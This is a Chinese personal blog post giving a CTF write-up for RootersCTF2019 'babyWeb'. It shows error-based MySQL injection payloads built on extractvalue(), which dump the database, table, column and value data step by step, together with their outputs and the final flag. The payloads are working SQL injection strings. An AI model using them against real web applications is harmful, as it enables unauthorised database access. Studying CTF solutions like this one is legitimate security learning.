[CTF]WriteUp第51篇 – lingye的个人blog

公告

如果你感觉正文部分太窄，可以将浏览器的缩放调成90%

lingye

lingye的中文是"翎鵺"

[CTF]WriteUp第51篇

2025-2-11 23:03

|

2025-2-11 23:03

|

411

|

0

|

118 字

|

2 分钟

[RootersCTF2019]babyWeb

思路

简洁明了的SQL注入题目，禁union想到可以报错注入

解题

回显也是直接了当

# 库
1||extractvalue(1,concat(0x7e,(select(database())),0x7e))#

XPATH syntax error: '~sql_injection~'


# 表
1||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),0x7e))#

XPATH syntax error: '~users~'


# 字段
1||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)=database()),0x7e))#

XPATH syntax error: '~user,uniqueid~'


# 值
1||extractvalue(1,concat(0x7e,(select(group_concat(uniqueid))from(users)),0x7e))#

XPATH syntax error: '~837461526918364526,123456789928'


# flag
837461526918364526

flag{04d6064d-5162-4e29-9b99-676cb6157f25}

注意

这道题过滤or却不过滤information，很奇怪。
如果过滤后者，可以参考绕过（过滤）相关中关于sql绕过的部分

暂无评论

发送评论编辑评论

Markdown

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!